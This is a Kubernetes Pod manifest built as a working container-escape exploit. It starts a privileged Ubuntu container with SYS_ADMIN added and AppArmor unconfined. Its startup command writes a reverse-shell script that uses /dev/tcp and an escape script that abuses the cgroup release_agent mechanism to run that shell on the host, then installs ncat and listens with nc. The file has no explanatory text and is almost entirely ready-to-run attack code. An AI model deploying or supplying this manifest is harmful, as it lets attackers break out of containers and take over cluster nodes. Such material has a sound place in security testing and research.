apiVersion: v1
kind: Pod
metadata:
  name: pod-cap-full
  labels:
  annotations:
    container.apparmor.security.beta.kubernetes.io/pod-cap-full: unconfined
spec:
  containers:
  - name: pod-cap-full
    image: ubuntu
    securityContext:
      capabilities:
        add: ["SYS_ADMIN"]
    tty: true
    env:
    - name: POD_IP
      valueFrom:
        fieldRef:
          fieldPath: status.podIP
    - name: PORT
      value: "9001"
    command:
    - /bin/bash
    - -c
    - |
      apt update && apt install -y ncat
      cat <<EOF >/shell.sh
      #!/bin/bash
      /bin/bash -c "/bin/bash -i >& /dev/tcp/${POD_IP}/${PORT} 0>&1"
      EOF
      cat <<EOF >/escape.sh
      #!/bin/bash
      overlay=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /proc/mounts`
      mkdir /tmp/escape
      mount -t cgroup -o blkio cgroup /tmp/escape
      mkdir -p /tmp/escape/w
      echo 1 > /tmp/escape/w/notify_on_release
      echo "\$overlay/shell.sh" > /tmp/escape/release_agent
      sleep 3 && echo 0 >/tmp/escape/w/cgroup.procs &
      nc -l -p ${PORT} 
      EOF
      chmod +x /escape.sh /shell.sh
      sleep 1d
